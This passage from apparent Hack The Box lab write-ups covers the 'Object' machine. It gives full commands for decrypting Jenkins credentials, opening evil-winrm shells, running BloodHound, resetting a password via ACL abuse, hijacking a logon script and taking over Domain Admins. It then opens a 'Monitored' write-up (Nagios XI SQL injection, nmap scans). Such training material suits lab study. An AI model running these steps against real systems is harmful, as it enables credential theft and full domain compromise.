"gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA=" | base64 -d > hudson.util.Secret</code></pre></div> <p>After saving <code class="language-text">config.xml</code>, <code class="language-text">master.key</code>, and <code class="language-text">hudson.util.Secret</code> locally, I used Jenkins Credentials Decryptor to obtain the credentials for the user <code class="language-text">oliver</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Object] └─$ chmod +x jenkins-credentials-decryptor ┌──(kali㉿kali)-[~/Desktop/HTB/Object] └─$ ./jenkins-credentials-decryptor Please provide all required flags. Usage: jenkins-credentials-decryptor \ -m master.key \ -s hudson.util.Secret \ -c credentials.xml \ -o json Flags: -c string (required) credentials.xml file location -m string (required) master.key file location -o string (optional) output format [json|text] (default "json") -s string (required) hudson.util.Secret file location -version (optional) show version ┌──(kali㉿kali)-[~/Desktop/HTB/Object] └─$ ./jenkins-credentials-decryptor -c config.xml -m master.key -s hudson.util.Secret [ { "id": "320a60b9-1e5c-4399-8afe-44466c9cde9e", "password": "c1cdfun_d2434", "username": "oliver" } ]</code></pre></div> <p>Since this was a Windows machine, I checked these credentials against WinRM. <code class="language-text">netexec</code> confirmed that these credentials were valid:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Object] └─$ netexec winrm 10.10.11.132 -u 'oliver' -p 'c1cdfun_d2434' WINRM 10.10.11.132 5985 JENKINS [*] Windows 10 / Server 2019 Build 17763 (name:JENKINS) (domain:object.local) WINRM 10.10.11.132 5985 JENKINS [+] object.local\oliver:c1cdfun_d2434 (Pwn3d!)</code></pre></div> <p><code class="language-text">evil-winrm</code> shell as <code class="language-text">oliver</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Object] └─$ evil-winrm -i 10.10.11.132 -u 'oliver' -p 'c1cdfun_d2434' Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\oliver\Documents> whoami object\oliver *Evil-WinRM* PS C:\Users\oliver\Documents> cd ../desktop *Evil-WinRM* PS C:\Users\oliver\desktop> ls Directory: C:\Users\oliver\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/3/2024 5:23 PM 34 user.txt</code></pre></div> <p>Enumeration revealed that the user was part of an AD domain and <code class="language-text">netstat</code> indicated that the machine was a domain controller based on the listening ports:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Users\oliver\desktop> netstat -an | findstr LISTEN TCP 0.0.0.0:80 0.0.0.0:0 LISTENING TCP 0.0.0.0:88 0.0.0.0:0 LISTENING TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:389 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:464 0.0.0.0:0 LISTENING TCP 0.0.0.0:593 0.0.0.0:0 LISTENING TCP 0.0.0.0:636 0.0.0.0:0 LISTENING TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING TCP 0.0.0.0:49673 0.0.0.0:0 LISTENING TCP 0.0.0.0:49674 0.0.0.0:0 LISTENING TCP 0.0.0.0:49684 0.0.0.0:0 LISTENING TCP 0.0.0.0:49695 0.0.0.0:0 LISTENING TCP 10.10.11.132:53 0.0.0.0:0 LISTENING TCP 10.10.11.132:139 0.0.0.0:0 LISTENING TCP 127.0.0.1:53 0.0.0.0:0 LISTENING &lt;...snip...></code></pre></div> <p>To collect domain data, I uploaded <code class="language-text">SharpHound.exe</code>, but it didn't run. Next, I tried <code class="language-text">SharpHound.ps1</code> which worked:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> upload SharpHound.ps1 Info: Uploading /home/kali/Desktop/HTB/Object/SharpHound.ps1 to C:\programdata\SharpHound.ps1 Data: 1744464 bytes of 1744464 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\programdata> . .\SharpHound.ps1 *Evil-WinRM* PS C:\programdata> Invoke-BloodHound -CollectionMethods All -OutputDirectory C:\programdata *Evil-WinRM* PS C:\programdata> ls Directory: C:\programdata Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 10/21/2021 3:13 AM Microsoft d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft d----- 9/15/2018 12:19 AM SoftwareDistribution d----- 4/10/2020 5:48 AM ssh d----- 4/10/2020 10:49 AM USOPrivate d----- 4/10/2020 10:49 AM USOShared d----- 8/25/2021 2:57 AM VMware -a---- 12/3/2024 6:52 PM 11443 20241203185242_BloodHound.zip -a---- 12/3/2024 6:52 PM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin -a---- 12/3/2024 6:49 PM 578048 SharpHound.exe -a---- 12/3/2024 6:51 PM 1308348 SharpHound.ps1</code></pre></div> <p>I downloaded the ZIP:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> download 20241203185242_BloodHound.zip Info: Downloading C:\programdata\20241203185242_BloodHound.zip to 20241203185242_BloodHound.zip Info: Download successful!</code></pre></div> <p>After uploading the data into BloodHound, viewing First Degree Object Control for <code class="language-text">oliver</code> showed that the user had ForceChangePassword rights over <code class="language-text">smith</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e0f1bf7dac0703953240117e929afc8e/ebef9/oliver-object-control.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 46.835443037974684%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABNUlEQVR42p2Sy07CUBCGWbgwutAQ3RjjDg21N1oubaGUWgSqLSgXDWLUsDBuXPkIPvjnacUQEbwtJnPOyeT7Z/45GbVc5z+hWY2l75lfAypeGum9UkfWHdSSO39bCUwKKnOAXKxxbFaRDCfNmt3gMGewcbfNTmkfVXsXWApM1QxxLtTJC0C+YOP4Ic3zPvFwQrs7xD2NyWslNl+z7A4OUBUX1VoGtEQ3co1ssMd6J0vYuWYyfWJ8/0h//IDf6WE4J7hBRLM7wIsj3LMIr9VDF34qYvxPQM32kHIWa9MtLl8UbqoRpt9OxzzSLSSRlZlnhuNjWgF62adg+189TArNakAQ9rEvQp6vRtzGI+TZJheNT+o/Olq5ZV2MXKw1qTgtpLIACWVDhPLH75RZVE22qn7TwU/AN/xrKb/DBblAAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Oliver First Degree Object Control" title="" src="/static/e0f1bf7dac0703953240117e929afc8e/50637/oliver-object-control.png" srcset="/static/e0f1bf7dac0703953240117e929afc8e/dda05/oliver-object-control.png 158w, /static/e0f1bf7dac0703953240117e929afc8e/679a3/oliver-object-control.png 315w, /static/e0f1bf7dac0703953240117e929afc8e/50637/oliver-object-control.png 630w, /static/e0f1bf7dac0703953240117e929afc8e/ebef9/oliver-object-control.png 654w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>First Degree Object Control for <code class="language-text">smith</code> showed GenericWrite access over <code class="language-text">maria</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7685728f0309844db2877e5911a06079/ebef9/smith-object-control.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 47.46835443037975%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABN0lEQVR42p2SSUvDUBDHAyIIHhRcEBeEKm1NE5vtJWmWl0ViYyRpS1uDUPESrx79AB68+pH/JiGWtBahPQzz3syb37xZmFuVYl3pag5ExSv1so9ZNvCqnWt7HlgP4kluJxQtieDcaIIVe3+gi0CNQlDdUoo7K5lo50Ed2SxhouGB6AH2uWNsfe7g6PICguZVn1gB7BIH17KIpkLyhy7Muwjh4AnpS4ZkOoMTxqBOjFYs4eS7gTYlkDV/FdCGYHponPHYftvFXnSI53GG9DVDNEph+lFVPgW9jxE8TuC6Cdz+oPSVragDiwyi7oGVdRx8nOLrPcHY6uNKMnBTK/m3jxyxwGt2frYWYHMgp1jouSGCZAo/HGL2MEIUDSEYPrpFK9bYAKY+QU6pppgn6Cg2NlkpZpOg/4A/uQspZtXr8K8AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Smith First Degree Object Control" title="" src="/static/7685728f0309844db2877e5911a06079/50637/smith-object-control.png" srcset="/static/7685728f0309844db2877e5911a06079/dda05/smith-object-control.png 158w, /static/7685728f0309844db2877e5911a06079/679a3/smith-object-control.png 315w, /static/7685728f0309844db2877e5911a06079/50637/smith-object-control.png 630w, /static/7685728f0309844db2877e5911a06079/ebef9/smith-object-control.png 654w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>First Degree Object Control for <code class="language-text">maria</code> showed WriteOwner access over the <code class="language-text">Domain Admins</code> group:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5c14286a44a34b75f0a8717fda1871e3/ebef9/maria-object-control.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 48.10126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABOklEQVR42p2SS0/CQBSFWbkimujGhTsSwbRlpi2PPmY6UKSCpcY2PGLADfoLNPE3sHPtrz1eSCERDLEuTiaZm/nmnJNbqrcCFBFrr09Jp/p1XioKNJoBTK8DreH+EehsnaidjKbc3OkNCduXqNQ4uv2UZvI4cP3YtLpgLYUad0guNNvP40lwJ8JdouPt4wRPcwtG4wiQtzuocIbz/hWqBBs8TBElY8yeXzGZL3Ebp/DCESyHY/V5hji7RJWpvNN9IF0ahkC5eYHTVRmDlsB48YLh4wyiF9NcIRymmw/6oykUxQ2HE/TuM1IKywt3tWyAzFEQQYzrrI3sXeBrsUTN9nBjutSb2IslYbqHzn445E4HQZQgpJ9VkECoCD45Y3mvRbZg16FmC1oFHxrF1cm+ceCsIHAbgeWq/1Pf1C9M1+nqGuwAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Maria First Degree Object Control" title="" src="/static/5c14286a44a34b75f0a8717fda1871e3/50637/maria-object-control.png" srcset="/static/5c14286a44a34b75f0a8717fda1871e3/dda05/maria-object-control.png 158w, /static/5c14286a44a34b75f0a8717fda1871e3/679a3/maria-object-control.png 315w, /static/5c14286a44a34b75f0a8717fda1871e3/50637/maria-object-control.png 630w, /static/5c14286a44a34b75f0a8717fda1871e3/ebef9/maria-object-control.png 654w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Therefore, domain admin could be achieved in three jumps. So next, I uploaded <a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1" target="_blank">PowerView</a> into the WinRM session:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> upload PowerView.ps1 Info: Uploading /home/kali/Desktop/HTB/Object/PowerView.ps1 to C:\programdata\PowerView.ps1 Data: 1206372 bytes of 1206372 bytes copied Info: Upload successful!</code></pre></div> <p>Using <code class="language-text">Set-DomainUserPassword</code> from Powerview, I changed the password of <code class="language-text">smith</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1 *Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force *Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity smith -AccountPassword $password</code></pre></div> <p>I was then able to log in as <code class="language-text">smith</code> over WinRM:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Object] └─$ evil-winrm -i 10.10.11.132 -u 'smith' -p 'P@ssw0rd' Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\smith\Documents> whoami object\smith</code></pre></div> <p>Since smith had GenericWrite over <code class="language-text">maria</code>, I attempted a targeted kerberoasting attack, but the password didn't crack. However, as mentioned <a href="https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#genericwrite-on-user" target="_blank">here</a>, GenericWrite can also be used to edit the logon script of a user. Thus, I created a PowerShell script (<code class="language-text">run.ps1</code>) containing a command to output the results of <code class="language-text">ls c:\users\maria</code> into <code class="language-text">c:\programdata\output</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> echo "ls c:\users\maria > c:\programdata\output" > run.ps1</code></pre></div> <p>Then, using PowerView, I set the logon script path for <code class="language-text">maria</code> to be <code class="language-text">c:\programdata\run.ps1</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1 *Evil-WinRM* PS C:\programdata> Set-DomainObject -Identity maria -SET @{scriptpath="c:\programdata\run.ps1"}</code></pre></div> <p><code class="language-text">output</code> was written into the current directory:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> ls Directory: C:\programdata Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 10/21/2021 3:13 AM Microsoft d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft d----- 9/15/2018 12:19 AM SoftwareDistribution d----- 4/10/2020 5:48 AM ssh d----- 4/10/2020 10:49 AM USOPrivate d----- 4/10/2020 10:49 AM USOShared d----- 8/25/2021 2:57 AM VMware -a---- 12/3/2024 6:52 PM 11443 20241203185242_BloodHound.zip -a---- 12/3/2024 6:52 PM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin -a---- 12/3/2024 7:04 PM 3476 output -a---- 12/3/2024 7:00 PM 904779 PowerView.ps1 -a---- 12/3/2024 7:04 PM 88 run.ps1 -a---- 12/3/2024 6:49 PM 578048 SharpHound.exe -a---- 12/3/2024 6:51 PM 1308348 SharpHound.ps1</code></pre></div> <p>I was able to enumerate the user directory for <code class="language-text">maria</code> by reading <code class="language-text">output</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> cat output Directory: C:\users\maria Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 10/22/2021 3:54 AM 3D Objects d-r--- 10/22/2021 3:54 AM Contacts d-r--- 10/25/2021 3:47 AM Desktop d-r--- 10/25/2021 10:07 PM Documents d-r--- 10/22/2021 3:54 AM Downloads d-r--- 10/22/2021 3:54 AM Favorites d-r--- 10/22/2021 3:54 AM Links d-r--- 10/22/2021 3:54 AM Music d-r--- 10/22/2021 3:54 AM Pictures d-r--- 10/22/2021 3:54 AM Saved Games d-r--- 10/22/2021 3:54 AM Searches d-r--- 10/22/2021 3:54 AM Videos</code></pre></div> <p>Next, I edited <code class="language-text">run.ps1</code> to list the contents of <code class="language-text">c:\users\maria\desktop</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> echo "ls c:\users\maria\desktop > c:\programdata\output" > run.ps1 *Evil-WinRM* PS C:\programdata> ls Directory: C:\programdata Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 10/21/2021 3:13 AM Microsoft d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft d----- 9/15/2018 12:19 AM SoftwareDistribution d----- 4/10/2020 5:48 AM ssh d----- 4/10/2020 10:49 AM USOPrivate d----- 4/10/2020 10:49 AM USOShared d----- 8/25/2021 2:57 AM VMware -a---- 12/3/2024 6:52 PM 11443 20241203185242_BloodHound.zip -a---- 12/3/2024 6:52 PM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin -a---- 12/3/2024 7:06 PM 830 output -a---- 12/3/2024 7:00 PM 904779 PowerView.ps1 -a---- 12/3/2024 7:06 PM 104 run.ps1 -a---- 12/3/2024 6:49 PM 578048 SharpHound.exe -a---- 12/3/2024 6:51 PM 1308348 SharpHound.ps1</code></pre></div> <p><code class="language-text">c:\users\maria\desktop</code> contained <code class="language-text">Engines.xls</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> cat output Directory: C:\users\maria\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 10/26/2021 8:13 AM 6144 Engines.xls</code></pre></div> <p>I edited <code class="language-text">run.ps1</code> to copy <code class="language-text">Engines.xls</code> into <code class="language-text">c:\programdata</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> echo 'copy c:\users\maria\desktop\Engines.xls c:\programdata' > run.ps1 *Evil-WinRM* PS C:\programdata> ls Directory: C:\programdata Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 10/21/2021 3:13 AM Microsoft d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft d----- 9/15/2018 12:19 AM SoftwareDistribution d----- 4/10/2020 5:48 AM ssh d----- 4/10/2020 10:49 AM USOPrivate d----- 4/10/2020 10:49 AM USOShared d----- 8/25/2021 2:57 AM VMware -a---- 12/3/2024 6:52 PM 11443 20241203185242_BloodHound.zip -a---- 10/26/2021 8:13 AM 6144 Engines.xls -a---- 12/3/2024 6:52 PM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin -a---- 12/3/2024 7:09 PM 830 output -a---- 12/3/2024 7:00 PM 904779 PowerView.ps1 -a---- 12/3/2024 7:09 PM 114 run.ps1 -a---- 12/3/2024 6:49 PM 578048 SharpHound.exe -a---- 12/3/2024 6:51 PM 1308348 SharpHound.ps1</code></pre></div> <p>I downloaded <code class="language-text">Engines.xls</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> download Engines.xls Info: Downloading C:\programdata\Engines.xls to Engines.xls Info: Download successful!</code></pre></div> <p><code class="language-text">Engines.xls</code> contained three passwords:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 620px; " > <a class="gatsby-resp-image-link" href="/static/a3abade287886279f63b1adf38d0bd18/913ff/engines-xls.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 17.088607594936708%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAA7DAAAOwwHHb6hkAAAAuUlEQVR42h2O3WqDQBQGff93StPqrol/DTWQ6CoYJFjEkrVx217J9LgXw3czhznB/f7Jsvzg3J/sr+fxsJxO77zsdiilyLIMrRU6jtnvX6mqimmaGMfR75dgrSXPc4IwfOMqgjE1TdMIBiO7HZXnM6auUVpzDCPKoiBJU2pj6LqOtm2JopA4PtD3PZHEg+R48B98lCXP58I8z1jBOccwDL6cSTmX8E0im/ct3rqu3kmThEJCW+ByufIPGe7VHUDDfjEAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Engines.xls" title="" src="/static/a3abade287886279f63b1adf38d0bd18/913ff/engines-xls.png" srcset="/static/a3abade287886279f63b1adf38d0bd18/dda05/engines-xls.png 158w, /static/a3abade287886279f63b1adf38d0bd18/679a3/engines-xls.png 315w, /static/a3abade287886279f63b1adf38d0bd18/913ff/engines-xls.png 620w" sizes="(max-width: 620px) 100vw, 620px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used <code class="language-text">netexec</code> to check each password against WinRM, and <code class="language-text">W3llcr4ft3d_4cls</code> was valid:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Object] └─$ netexec winrm 10.10.11.132 -u 'maria' -p 'W3llcr4ft3d_4cls' WINRM 10.10.11.132 5985 JENKINS [*] Windows 10 / Server 2019 Build 17763 (name:JENKINS) (domain:object.local) WINRM 10.10.11.132 5985 JENKINS [+] object.local\maria:W3llcr4ft3d_4cls (Pwn3d!)</code></pre></div> <p><code class="language-text">evil-winrm</code> shell as <code class="language-text">maria</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Object] └─$ evil-winrm -i 10.10.11.132 -u 'maria' -p 'W3llcr4ft3d_4cls' Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\maria\Documents> whoami object\maria</code></pre></div> <p>As discovered earlier in BloodHound, <code class="language-text">maria</code> had WriteOwner permissions on <code class="language-text">Domain Admins</code>. I used PowerView to change the owner of <code class="language-text">Domain Admins</code> to <code class="language-text">maria</code>, give the user full rights, and then add the user as a member:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1 *Evil-WinRM* PS C:\programdata> Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria' *Evil-WinRM* PS C:\programdata> Add-DomainObjectAcl -TargetIdentity 'Domain Admins' -PrincipalIdentity 'maria' -Rights All *Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'</code></pre></div> <p>I confirmed <code class="language-text">maria</code> was successfully added to the <code class="language-text">Domain Admins</code> group:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> net user maria User name maria Full Name maria garcia Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/21/2021 8:16:32 PM Password expires Never Password changeable 10/22/2021 8:16:32 PM Password required Yes User may change password Yes Workstations allowed All Logon script c:\programdata\run.ps1 User profile Home directory Last logon 12/3/2024 7:14:20 PM Logon hours allowed All Local Group Memberships *Remote Management Use Global Group memberships *Domain Admins *Domain Users The command completed successfully.</code></pre></div> <p>In order for the change to actually take effect, I needed to exit the WinRM session and log in again. After doing so, I was then able to access the <code class="language-text">administrator</code> user's directory:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Object] └─$ evil-winrm -i 10.10.11.132 -u 'maria' -p 'W3llcr4ft3d_4cls' Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\maria\Documents> cd \users\administrator\desktop *Evil-WinRM* PS C:\users\administrator\desktop> ls Directory: C:\users\administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/3/2024 5:23 PM 34 root.txt</code></pre></div>https://mgarrity.com/hack-the-box-monitored/https://mgarrity.com/hack-the-box-monitored/Fri, 01 Nov 2024 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7ab7a6b8ea4798bdf5f59c32066e8326/3b67f/monitored.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA7klEQVR42p2SzU7CQBRGuxdJBEELpRHccUuhPylKjWVDiAvjTi2ydqOBIC+D8WEPHUh3MICLm5tJZk7O92WMy4awbyq2UKoLZ1fChbU96+6rMXSwwrXQaAp3gYvdciiY7YNQYx+saApx2GGR+swnXRbvPe6DDuem3nQnUMWzb4XlxCdIEuLxC2E84CftYWXGJesEYB61H7p8pV2G029Wf788T2d8vrpEvt5yp6EysFvK0CNKHgmfPngYj1imHvVTDdVUN5btrDNnE3uWgedvHn3f+V+HeXT1WHUWeQ61GzkI0wJz03K2i7Xtrh7xD9fxKgJVxqYwlgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Monitored" title="" src="/static/7ab7a6b8ea4798bdf5f59c32066e8326/50637/monitored.png" srcset="/static/7ab7a6b8ea4798bdf5f59c32066e8326/dda05/monitored.png 158w, /static/7ab7a6b8ea4798bdf5f59c32066e8326/679a3/monitored.png 315w, /static/7ab7a6b8ea4798bdf5f59c32066e8326/50637/monitored.png 630w, /static/7ab7a6b8ea4798bdf5f59c32066e8326/fddb0/monitored.png 945w, /static/7ab7a6b8ea4798bdf5f59c32066e8326/3b67f/monitored.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Monitored is a Linux machine running an instance of Nagios XI. A username and password for Nagios can be discovered from SNMP data, which reveals a command containing credentials for the <code class="language-text">svc</code> user. Although this user's account is disabled, an authentication token can still be obtained via the Nagios API, granting access to the dashboard. A SQL injection vulnerability (CVE-2023-40931) in Nagios XI can then be exploited to retrieve the <code class="language-text">nagiosadmin</code> user's API key, enabling the creation of a new admin user. With admin access, arbitrary commands can be executed on the host, resulting in a shell as the <code class="language-text">nagios</code> user. To escalate privileges, <code class="language-text">sudo</code> permissions on a bash script can be leveraged to read the <code class="language-text">root</code> user's SSH key, leading to a root shell.</p> <p><code class="language-text">nmap</code> scan (all ports):</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ nmap -p- 10.10.11.248 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 01:20 EDT Nmap scan report for nagios.monitored.htb (10.10.11.248) Host is up (0.048s latency). Not shown: 65530 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 389/tcp open ldap 443/tcp open https 5667/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 25.51 seconds</code></pre></div> <p>Script and version scan on open ports:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ nmap -sC -sV -p 22,80,389,443,5667 -oA nmap/output 10.10.11.248 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 01:21 EDT Nmap scan report for nagios.monitored.htb (10.10.11.248) Host is up (0.044s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA) | 256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA) |_ 256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519) 80/tcp open http Apache httpd 2.4.56 |_http-server-header: Apache/2.4.56 (Debian) |_http-title: Did not follow redirect to https://nagios.monitored.htb 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X 443/tcp open ssl/http Apache httpd 2.4.56 ((Debian)) |_http-server-header: Apache/2.4.56 (Debian) | ssl-cert: Subject: 